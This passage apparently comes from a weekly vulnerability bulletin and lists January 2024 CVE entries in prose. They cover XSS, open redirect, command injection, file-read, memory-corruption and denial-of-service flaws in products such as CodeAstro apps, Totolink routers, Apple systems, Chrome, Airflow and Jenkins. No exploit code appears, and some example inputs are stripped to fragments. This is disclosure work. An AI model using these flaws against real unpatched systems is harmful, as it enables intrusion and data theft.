A vulnerability, which was classified as problematic, was found in CodeAstro Internet Banking System 1.0. This affects an unknown part of the file pages_client_signup.php. The manipulation of the argument Client Full Name with the input leads to open redirect. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251697 was assigned to this vulnerability. | 2024-01-22 | 3.5 | CVE-2024-0781 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| codeastro — online_railway_reservation_system  |
A vulnerability has been found in CodeAstro Online Railway Reservation System 1.0 and classified as problematic. This vulnerability affects unknown code of the file pass-profile.php. The manipulation of the argument First Name/Last Name/User Name leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-251698 is the identifier assigned to this vulnerability. | 2024-01-22 | 3.5 | CVE-2024-0782 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| codeastro — stock_management_system  |
A vulnerability was found in CodeAstro Stock Management System 1.0 and classified as problematic. This issue affects some unknown processing of the file /index.php of the component Add Category Handler. The manipulation of the argument Category Name/Category Description leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252203. | 2024-01-27 | 3.5 | CVE-2024-0958 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| dell — unity  |
Dell Unity, versions prior to 5.4, contain a vulnerability whereby log messages can be spoofed by an authenticated attacker. An attacker could exploit this vulnerability to forge log entries, create false alarms, and inject malicious content into logs that compromise logs integrity. A malicious attacker could also prevent the product from logging information while malicious actions are performed or implicate an arbitrary user for malicious activities. | 2024-01-24 | 3.1 | CVE-2024-22229 security_alert@emc.com |
| hongmaple — octopus  |
A vulnerability was found in hongmaple octopus 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality. The manipulation of the argument description with the input leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The associated identifier of this vulnerability is VDB-252043. | 2024-01-25 | 3.5 | CVE-2024-0891 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| lenovo — tab_m8_hd_tb8505f_firmware | An information disclosure vulnerability was reported in the Lenovo Tab M8 HD that could allow a local application to gather a non-resettable device identifier. | 2024-01-19 | 3.3 | CVE-2023-5081 psirt@lenovo.com |
| linzhaoguan — pb-cms  |
A vulnerability, which was classified as problematic, has been found in LinZhaoguan pb-cms 2.0. Affected by this issue is some unknown functionality of the component Comment Handler. The manipulation with the input
leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251678 is the identifier assigned to this vulnerability.
|
2024-01-22 | 3.5 | CVE-2024-0776 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| microsoft — microsoft_edge_(chromium-based) Â |
Microsoft Edge (Chromium-based) Spoofing Vulnerability | 2024-01-26 | 3.3 | CVE-2024-21383 secure@microsoft.com |
| microsoft — microsoft_edge_(chromium-based) Â |
Microsoft Edge (Chromium-based) Spoofing Vulnerability | 2024-01-26 | 2.5 | CVE-2024-21336 secure@microsoft.com |
| netbox — netbox  |
A vulnerability, which was classified as problematic, has been found in NetBox up to 3.7.0. This issue affects some unknown processing of the file /core/config-revisions of the component Home Page Configuration. The manipulation with the input <
>testleads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252191. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. |
2024-01-26 | 2.4 | CVE-2024-0948 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| poikosoft — ez_cd_audio_converter  |
A vulnerability classified as problematic was found in Poikosoft EZ CD Audio Converter 8.0.7. Affected by this vulnerability is an unknown functionality of the component Activation Handler. The manipulation of the argument Key leads to denial of service. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The identifier VDB-252037 was assigned to this vulnerability. | 2024-01-25 | 3.3 | CVE-2024-0886 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| smp7,wp.insider — simple_membership  |
URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in smp7, wp.Insider Simple Membership. This issue affects Simple Membership: from n/a through 4.4.1. | 2024-01-24 | 3.4 | CVE-2024-22308 audit@patchstack.com |
| totolink — n200re_v5 Â |
A vulnerability was found in Totolink N200RE V5 9.3.5u.6255_B20211224. It has been classified as problematic. Affected is an unknown function of the file /cgi-bin/cstecgi.cgi. The manipulation leads to session expiration. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. VDB-252186 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-26 | 3.7 | CVE-2024-0942 cna@vuldb.com cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| totolink — n350rt  |
A vulnerability was found in Totolink N350RT 9.3.5u.6255. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /cgi-bin/cstecgi.cgi. The manipulation leads to session expiration. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252187. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-26 | 3.7 | CVE-2024-0943 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| totolink — t8 Â |
A vulnerability was found in Totolink T8 4.1.5cu.833_20220905. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /cgi-bin/cstecgi.cgi. The manipulation leads to session expiration. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252188. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-26 | 3.7 | CVE-2024-0944 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
Severity Not Yet Assigned
| Primary Vendor — Product |
Description | Published | CVSS Score | Source & Patch Info |
|---|---|---|---|---|
| angel_coffee — mini-app_line  |
An issue in angel coffee mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. | 2024-01-26 | not yet calculated | CVE-2023-48133 cve@mitre.org |
| anglersnet_co._ltd. — access_analysis_cgi_an-analyzer  |
Open redirect vulnerability in Access analysis CGI An-Analyzer released in 2023 December 31 and earlier allows a remote unauthenticated attacker to redirect users to arbitrary websites and conduct phishing attacks via a specially crafted URL. | 2024-01-22 | not yet calculated | CVE-2024-22113 vultures@jpcert.or.jp vultures@jpcert.or.jp |
| apache_software_foundation — apache_airflow  |
Apache Airflow, versions before 2.8.1, have a vulnerability that allows a potential attacker to poison the XCom data by bypassing the protection of “enable_xcom_pickling=False” configuration setting resulting in poisoned data after XCom deserialization. This vulnerability is considered low since it requires a DAG author to exploit it. Users are recommended to upgrade to version 2.8.1 or later, which fixes this issue. | 2024-01-24 | not yet calculated | CVE-2023-50943 security@apache.org security@apache.org security@apache.org |
| apache_software_foundation — apache_airflow  |
Apache Airflow, versions before 2.8.1, have a vulnerability that allows an authenticated user to access the source code of a DAG to which they don’t have access. This vulnerability is considered low since it requires an authenticated user to exploit it. Users are recommended to upgrade to version 2.8.1, which fixes this issue. | 2024-01-24 | not yet calculated | CVE-2023-50944 security@apache.org security@apache.org security@apache.org |
| apache_software_foundation — apache_airflow_cncf_kubernetes_provider  |
Since version 5.2.0, when using deferrable mode with the path of a Kubernetes configuration file for authentication, the Airflow worker serializes this configuration file as a dictionary and sends it to the triggerer by storing it in metadata without any encryption. Additionally, if used with an Airflow version between 2.3.0 and 2.6.0, the configuration dictionary will be logged as plain text in the triggerer service without masking. This allows anyone with access to the metadata or triggerer log to obtain the configuration file and use it to access the Kubernetes cluster. This behavior was changed in version 7.0.0, which stopped serializing the file contents and started providing the file path instead to read the contents into the trigger. Users are recommended to upgrade to version 7.0.0, which fixes this issue. | 2024-01-24 | not yet calculated | CVE-2023-51702 security@apache.org security@apache.org security@apache.org security@apache.org security@apache.org |
| apple — ios_and_ipados  |
A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in iOS 16.7.5 and iPadOS 16.7.5, watchOS 10.2, macOS Ventura 13.6.4, macOS Sonoma 14.2, macOS Monterey 12.7.3, iOS 17.2 and iPadOS 17.2. An app may be able to access sensitive user data. | 2024-01-23 | not yet calculated | CVE-2023-42937 product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com |
| apple — ios_and_ipados  |
The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3. An app may be able to execute arbitrary code with kernel privileges. | 2024-01-23 | not yet calculated | CVE-2024-23208 product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com |
| apple — ios_and_ipados  |
This issue was addressed with improved redaction of sensitive information. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3. An app may be able to view a user’s phone number in system logs. | 2024-01-23 | not yet calculated | CVE-2024-23210 product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com |
| apple — ios_and_ipados  |
A privacy issue was addressed with improved handling of user preferences. This issue is fixed in watchOS 10.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, Safari 17.3. A user’s private browsing activity may be visible in Settings. | 2024-01-23 | not yet calculated | CVE-2024-23211 product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com |
| apple — ios_and_ipados  |
The issue was addressed with improved memory handling. This issue is fixed in watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, Safari 17.3. Processing web content may lead to arbitrary code execution. | 2024-01-23 | not yet calculated | CVE-2024-23213 product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com |
| apple — ios_and_ipados  |
Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, iOS 17.3 and iPadOS 17.3. Processing maliciously crafted web content may lead to arbitrary code execution. | 2024-01-23 | not yet calculated | CVE-2024-23214 product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com |
| apple — ios_and_ipados  |
An issue was addressed with improved handling of temporary files. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3. An app may be able to access user-sensitive data. | 2024-01-23 | not yet calculated | CVE-2024-23215 product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com |
| apple — ios_and_ipados  |
A privacy issue was addressed with improved handling of temporary files. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, iOS 17.3 and iPadOS 17.3. An app may be able to bypass certain Privacy preferences. | 2024-01-23 | not yet calculated | CVE-2024-23217 product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com |
| apple — ios_and_ipados  |
A timing side-channel issue was addressed with improvements to constant-time computation in cryptographic functions. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3. An attacker may be able to decrypt legacy RSA PKCS#1 v1.5 ciphertexts without having the private key. | 2024-01-23 | not yet calculated | CVE-2024-23218 product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com |
| apple — ios_and_ipados  |
The issue was addressed with improved authentication. This issue is fixed in iOS 17.3 and iPadOS 17.3. Stolen Device Protection may be unexpectedly disabled. | 2024-01-23 | not yet calculated | CVE-2024-23219 product-security@apple.com product-security@apple.com |
| apple — macos  |
Multiple issues were addressed by updating to curl version 8.4.0. This issue is fixed in macOS Ventura 13.6.4, macOS Sonoma 14.2, macOS Monterey 12.7.3, iOS 16.7.5 and iPadOS 16.7.5. Multiple issues in curl. | 2024-01-23 | not yet calculated | CVE-2023-42915 product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com |
| apple — macos  |
An authentication issue was addressed with improved state management. This issue is fixed in macOS Ventura 13.6.4. A local attacker may be able to view the previous logged in user’s desktop from the fast user switching screen. | 2024-01-23 | not yet calculated | CVE-2023-42935 product-security@apple.com product-security@apple.com product-security@apple.com |
| apple — macos  |
The issue was addressed with improved memory handling. This issue is fixed in watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, macOS Ventura 13.6.4, macOS Monterey 12.7.3. An app may be able to execute arbitrary code with kernel privileges. | 2024-01-23 | not yet calculated | CVE-2024-23212 product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com |
| apple — macos  |
A type confusion issue was addressed with improved checks. This issue is fixed in tvOS 17.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, Safari 17.3, macOS Ventura 13.6.4, macOS Monterey 12.7.3. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been exploited. | 2024-01-23 | not yet calculated | CVE-2024-23222 product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com |
| appleple_inc. — a-blog_cms_ver.3.1.x_series  |
Improper input validation vulnerability in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.7, Ver.3.0.x series versions prior to Ver.3.0.29, Ver.2.11.x series versions prior to Ver.2.11.58, Ver.2.10.x series versions prior to Ver.2.10.50, and Ver.2.9.0 and earlier allows a remote authenticated attacker to execute arbitrary code by uploading a specially crafted SVG file. | 2024-01-23 | not yet calculated | CVE-2024-23180 vultures@jpcert.or.jp vultures@jpcert.or.jp |
| appleple_inc. — a-blog_cms_ver.3.1.x_series  |
Cross-site scripting vulnerability in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.7, Ver.3.0.x series versions prior to Ver.3.0.29, Ver.2.11.x series versions prior to Ver.2.11.58, Ver.2.10.x series versions prior to Ver.2.10.50, and Ver.2.9.0 and earlier allows a remote unauthenticated attacker to execute an arbitrary script on the logged-in user’s web browser. | 2024-01-23 | not yet calculated | CVE-2024-23181 vultures@jpcert.or.jp vultures@jpcert.or.jp |
| appleple_inc. — a-blog_cms_ver.3.1.x_series  |
Relative path traversal vulnerability in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.7, Ver.3.0.x series versions prior to Ver.3.0.29, Ver.2.11.x series versions prior to Ver.2.11.58, Ver.2.10.x series versions prior to Ver.2.10.50, and Ver.2.9.0 and earlier allows a remote authenticated attacker to delete arbitrary files on the server. | 2024-01-23 | not yet calculated | CVE-2024-23182 vultures@jpcert.or.jp vultures@jpcert.or.jp |
| appleple_inc. — a-blog_cms_ver.3.1.x_series  |
Cross-site scripting vulnerability in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.7, Ver.3.0.x series versions prior to Ver.3.0.29, Ver.2.11.x series versions prior to Ver.2.11.58, Ver.2.10.x series versions prior to Ver.2.10.50, and Ver.2.9.0 and earlier allows a remote authenticated attacker to execute an arbitrary script on the logged-in user’s web browser. | 2024-01-23 | not yet calculated | CVE-2024-23183 vultures@jpcert.or.jp vultures@jpcert.or.jp |
| appleple_inc. — a-blog_cms_ver.3.1.x_series  |
Improper input validation vulnerability in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.7, Ver.3.0.x series versions prior to Ver.3.0.29, Ver.2.11.x series versions prior to Ver.2.11.58, Ver.2.10.x series versions prior to Ver.2.10.50, and Ver.2.9.0 and earlier allows a remote authenticated attacker to execute arbitrary JavaScript code by uploading a specially crafted SVG file. | 2024-01-23 | not yet calculated | CVE-2024-23348 vultures@jpcert.or.jp vultures@jpcert.or.jp |
| badaix — snapcast  |
An issue was discovered in badaix Snapcast version 0.27.0, allows remote attackers to execute arbitrary code and gain sensitive information via crafted request in JSON-RPC-API. | 2024-01-23 | not yet calculated | CVE-2023-36177 cve@mitre.org cve@mitre.org |
| beetl-bbs — beetl-bbs  |
Cross Site Scripting (XSS) vulnerability in beetl-bbs 2.0 allows attackers to run arbitrary code via the /index keyword parameter. | 2024-01-23 | not yet calculated | CVE-2024-22490 cve@mitre.org |
| chasquid — chasquid  |
chasquid before 1.13 allows SMTP smuggling because LF-terminated lines are accepted. | 2024-01-22 | not yet calculated | CVE-2023-52354 cve@mitre.org |
| chigasaki_bakery — mini-app_line  |
An issue in CHIGASAKI BAKERY mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. | 2024-01-26 | not yet calculated | CVE-2023-48131 cve@mitre.org |
| classLink — oneclick_extension  |
A Universal Cross Site Scripting (UXSS) vulnerability in ClassLink OneClick Extension through 10.8 allows remote attackers to inject JavaScript into any webpage. NOTE: this issue exists because of an incomplete fix for CVE-2022-48612. | 2024-01-23 | not yet calculated | CVE-2023-45889 cve@mitre.org cve@mitre.org |
| clojure — clojure  |
In Clojure before 1.9.0, classes can be used to construct a serialized object that executes arbitrary code upon deserialization. This is relevant if a server deserializes untrusted objects. | 2024-01-22 | not yet calculated | CVE-2017-20189 cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org |
| cloudlinux_os — cagefs  |
CloudLinux CageFS 7.1.1-1 or below passes the authentication token as command line argument. In some configurations this allows local users to view it via the process list and gain code execution as another user. | 2024-01-22 | not yet calculated | CVE-2020-36771 secalert@redhat.com secalert@redhat.com secalert@redhat.com |
| cloudlinux_os — cagefs  |
CloudLinux CageFS 7.0.8-2 or below insufficiently restricts file paths supplied to the sendmail proxy command. This allows local users to read and write arbitrary files outside the CageFS environment in a limited way. | 2024-01-22 | not yet calculated | CVE-2020-36772 secalert@redhat.com secalert@redhat.com secalert@redhat.com |
| cohesity — dataprotect  |
Cohesity DataProtect prior to 6.8.1_u5 or 7.1 was discovered to have an incorrect access control vulnerability due to a lack of TLS Certificate Validation. | 2024-01-19 | not yet calculated | CVE-2023-33295 cve@mitre.org cve@mitre.org |
| coign — crm_portal  |
An issue in Coign CRM Portal v.06.06 allows a remote attacker to escalate privileges via the userPermissionsList parameter in Session Storage component. | 2024-01-24 | not yet calculated | CVE-2023-43317 cve@mitre.org |
| contiki-ng — tinydtls | An issue was discovered in Contiki-NG tinyDTLS through 2018-08-30. One incorrect handshake could complete with different epoch numbers in the packets Client_Hello, Client_key_exchange, and Change_cipher_spec, which may cause denial of service. | 2024-01-22 | not yet calculated | CVE-2021-42141 cve@mitre.org cve@mitre.org cve@mitre.org |
| contiki-ng — tinydtls  |
An issue was discovered in Contiki-NG tinyDTLS through master branch 53a0d97. DTLS servers mishandle the early use of a large epoch number. This vulnerability allows remote attackers to cause a denial of service and false-positive packet drops. | 2024-01-23 | not yet calculated | CVE-2021-42142 cve@mitre.org cve@mitre.org |
| contiki-ng — tinydtls  |
An issue was discovered in Contiki-NG tinyDTLS through master branch 53a0d97. An infinite loop bug exists during the handling of a ClientHello handshake message. This bug allows remote attackers to cause a denial of service by sending a malformed ClientHello handshake message with an odd length of cipher suites, which triggers an infinite loop (consuming all resources) and a buffer over-read that can disclose sensitive information. | 2024-01-24 | not yet calculated | CVE-2021-42143 cve@mitre.org |
| contiki-ng — tinydtls  |
Buffer over-read vulnerability in Contiki-NG tinyDTLS through master branch 53a0d97 allows attackers obtain sensitive information via crafted input to dtls_ccm_decrypt_message(). | 2024-01-24 | not yet calculated | CVE-2021-42144 cve@mitre.org |
| contiki-ng — tinydtls  |
An assertion failure discovered in in check_certificate_request() in Contiki-NG tinyDTLS through master branch 53a0d97 allows attackers to cause a denial of service. | 2024-01-24 | not yet calculated | CVE-2021-42145 cve@mitre.org |
| contiki-ng — tinydtls  |
An issue was discovered in Contiki-NG tinyDTLS through master branch 53a0d97. DTLS servers allow remote attackers to reuse the same epoch number within two times the TCP maximum segment lifetime, which is prohibited in RFC6347. This vulnerability allows remote attackers to obtain sensitive application (data of connected clients). | 2024-01-24 | not yet calculated | CVE-2021-42146 cve@mitre.org |
| contiki-ng — tinydtls  |
Buffer over-read vulnerability in the dtls_sha256_update function in Contiki-NG tinyDTLS through master branch 53a0d97 allows remote attackers to cause a denial of service via crafted data packet. | 2024-01-24 | not yet calculated | CVE-2021-42147 cve@mitre.org |
| d-link — dir-815 Â |
There is a command injection vulnerability in the ssdpcgi_main function of cgibin binary in D-Link DIR-815 router firmware v1.04. | 2024-01-24 | not yet calculated | CVE-2024-22651 cve@mitre.org |
| d-link — dir-882 Â |
D-Link DIR-882 DIR882A1_FW130B06 was discovered to contain a stack overflow via the sub_477AA0 function. | 2024-01-24 | not yet calculated | CVE-2024-22751 cve@mitre.org cve@mitre.org |
| elecom_co._ltd. — wrc-x1800gs-b  |
OS command injection vulnerability in ELECOM wireless LAN routers allows a network-adjacent attacker with an administrative privilege to execute arbitrary OS commands by sending a specially crafted request to the product. Affected products and versions are as follows: WRC-X1800GS-B v1.17 and earlier, WRC-X1800GSA-B v1.17 and earlier, WRC-X1800GSH-B v1.17 and earlier, WRC-X6000XS-G v1.09, and WRC-X6000XST-G v1.12 and earlier. | 2024-01-24 | not yet calculated | CVE-2024-22372 vultures@jpcert.or.jp vultures@jpcert.or.jp |
| ezserver — ezserver  |
EzServer 6.4.017 allows a denial of service (daemon crash) via a long string, such as one for the RNTO command. | 2024-01-25 | not yet calculated | CVE-2024-23985 cve@mitre.org |
| ffmpeg — ffmpeg  |
Integer overflow vulnerability in FFmpeg before n6.1, allows remote attackers to execute arbitrary code via the jpegxl_anim_read_packet component in the JPEG XL Animation decoder. | 2024-01-27 | not yet calculated | CVE-2024-22860 cve@mitre.org cve@mitre.org |
| ffmpeg — ffmpeg  |
Integer overflow vulnerability in FFmpeg before n6.1, allows attackers to cause a denial of service (DoS) via the avcodec/osq module. | 2024-01-27 | not yet calculated | CVE-2024-22861 cve@mitre.org |
| ffmpeg — ffmpeg  |
Integer overflow vulnerability in FFmpeg before n6.1, allows remote attackers to execute arbitrary code via the JJPEG XL Parser. | 2024-01-27 | not yet calculated | CVE-2024-22862 cve@mitre.org cve@mitre.org |
| form_tools — form_tools  |
Form Tools v3.1.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component /form_builder/preview.php?form_id=2. | 2024-01-25 | not yet calculated | CVE-2024-22637 cve@mitre.org |
| ghost — ghost  |
Ghost before 5.76.0 allows XSS via a post excerpt in excerpt.js. An XSS payload can be rendered in post summaries. | 2024-01-21 | not yet calculated | CVE-2024-23725 cve@mitre.org cve@mitre.org |
| ginza_cafe — mini-app _line  |
An issue in GINZA CAFE mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. | 2024-01-26 | not yet calculated | CVE-2023-48130 cve@mitre.org |
| gnome — gdxpixbuf  |
In GNOME GdkPixbuf (aka gdk-pixbuf) through 2.42.10, the ANI (Windows animated cursor) decoder encounters heap memory corruption (in ani_load_chunk in io-ani.c) when parsing chunks in a crafted .ani file. A crafted file could allow an attacker to overwrite heap metadata, leading to a denial of service or code execution attack. This occurs in gdk_pixbuf_set_option() in gdk-pixbuf.c. | 2024-01-26 | not yet calculated | CVE-2022-48622 cve@mitre.org |
| google — chrome  |
Insufficient policy enforcement in iOS Security UI in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2024-01-24 | not yet calculated | CVE-2024-0804 chrome-cve-admin@google.com chrome-cve-admin@google.com chrome-cve-admin@google.com chrome-cve-admin@google.com |
| google — chrome  |
Inappropriate implementation in Downloads in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to perform domain spoofing via a crafted domain name. (Chromium security severity: Medium) | 2024-01-24 | not yet calculated | CVE-2024-0805 chrome-cve-admin@google.com chrome-cve-admin@google.com chrome-cve-admin@google.com chrome-cve-admin@google.com |
| google — chrome  |
Use after free in Passwords in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially exploit heap corruption via specific UI interaction. (Chromium security severity: Medium) | 2024-01-24 | not yet calculated | CVE-2024-0806 chrome-cve-admin@google.com chrome-cve-admin@google.com chrome-cve-admin@google.com chrome-cve-admin@google.com |
| google — chrome  |
Use after free in Web Audio in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2024-01-24 | not yet calculated | CVE-2024-0807 chrome-cve-admin@google.com chrome-cve-admin@google.com chrome-cve-admin@google.com chrome-cve-admin@google.com |
| google — chrome  |
Integer underflow in WebUI in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially exploit heap corruption via a malicious file. (Chromium security severity: High) | 2024-01-24 | not yet calculated | CVE-2024-0808 chrome-cve-admin@google.com chrome-cve-admin@google.com chrome-cve-admin@google.com chrome-cve-admin@google.com |
| google — chrome  |
Inappropriate implementation in Autofill in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to bypass Autofill restrictions via a crafted HTML page. (Chromium security severity: Low) | 2024-01-24 | not yet calculated | CVE-2024-0809 chrome-cve-admin@google.com chrome-cve-admin@google.com chrome-cve-admin@google.com chrome-cve-admin@google.com |
| google — chrome  |
Insufficient policy enforcement in DevTools in Google Chrome prior to 121.0.6167.85 allowed an attacker who convinced a user to install a malicious extension to leak cross-origin data via a crafted Chrome Extension. (Chromium security severity: Medium) | 2024-01-24 | not yet calculated | CVE-2024-0810 chrome-cve-admin@google.com chrome-cve-admin@google.com chrome-cve-admin@google.com chrome-cve-admin@google.com |
| google — chrome  |
Inappropriate implementation in Extensions API in Google Chrome prior to 121.0.6167.85 allowed an attacker who convinced a user to install a malicious extension to leak cross-origin data via a crafted Chrome Extension. (Chromium security severity: Low) | 2024-01-24 | not yet calculated | CVE-2024-0811 chrome-cve-admin@google.com chrome-cve-admin@google.com chrome-cve-admin@google.com chrome-cve-admin@google.com |
| google — chrome  |
Inappropriate implementation in Accessibility in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially exploit object corruption via a crafted HTML page. (Chromium security severity: High) | 2024-01-24 | not yet calculated | CVE-2024-0812 chrome-cve-admin@google.com chrome-cve-admin@google.com chrome-cve-admin@google.com chrome-cve-admin@google.com |
| google — chrome  |
Use after free in Reading Mode in Google Chrome prior to 121.0.6167.85 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via specific UI interaction. (Chromium security severity: Medium) | 2024-01-24 | not yet calculated | CVE-2024-0813 chrome-cve-admin@google.com chrome-cve-admin@google.com chrome-cve-admin@google.com chrome-cve-admin@google.com |
| google — chrome  |
Incorrect security UI in Payments in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially spoof security UI via a crafted HTML page. (Chromium security severity: Medium) | 2024-01-24 | not yet calculated | CVE-2024-0814 chrome-cve-admin@google.com chrome-cve-admin@google.com chrome-cve-admin@google.com chrome-cve-admin@google.com |
| gpac — gpac  |
GPAC v2.3 was detected to contain a buffer overflow via the function gf_isom_new_generic_sample_description function in the isomedia/isom_write.c:4577 | 2024-01-25 | not yet calculated | CVE-2024-22749 cve@mitre.org cve@mitre.org |
| igalerie — igalerie  |
iGalerie v3.0.22 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the Titre (Title) field in the editing interface. | 2024-01-25 | not yet calculated | CVE-2024-22639 cve@mitre.org |
| ivanti — avalanche  |
Directory Traversal vulnerability in Ivanti Avalanche 6.3.4.153 allows a remote authenticated attacker to obtain sensitive information via the javax.faces.resource component. | 2024-01-25 | not yet calculated | CVE-2023-41474 cve@mitre.org |
| jenkins — jenkins  |
Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an ‘@’ character followed by a file path in an argument with the file’s contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system. | 2024-01-24 | not yet calculated | CVE-2024-23897 jenkinsci-cert@googlegroups.com |
| jenkins — jenkins  |
Jenkins 2.217 through 2.441 (both inclusive), LTS 2.222.1 through 2.426.2 (both inclusive) does not perform origin validation of requests made through the CLI WebSocket endpoint, resulting in a cross-site WebSocket hijacking (CSWSH) vulnerability, allowing attackers to execute CLI commands on the Jenkins controller. | 2024-01-24 | not yet calculated | CVE-2024-23898 jenkinsci-cert@googlegroups.com |
| jenkins — jenkins  |
Jenkins Git server Plugin 99.va_0826a_b_cdfa_d and earlier does not disable a feature of its command parser that replaces an ‘@’ character followed by a file path in an argument with the file’s contents, allowing attackers with Overall/Read permission to read content from arbitrary files on the Jenkins controller file system. | 2024-01-24 | not yet calculated | CVE-2024-23899 jenkinsci-cert@googlegroups.com jenkinsci-cert@googlegroups.com |
| jenkins — jenkins  |
Jenkins Matrix Project Plugin 822.v01b_8c85d16d2 and earlier does not sanitize user-defined axis names of multi-configuration projects, allowing attackers with Item/Configure permission to create or replace any config.xml files on the Jenkins controller file system with content not controllable by the attackers. | 2024-01-24 | not yet calculated | CVE-2024-23900 jenkinsci-cert@googlegroups.com jenkinsci-cert@googlegroups.com |
| jenkins — jenkins  |
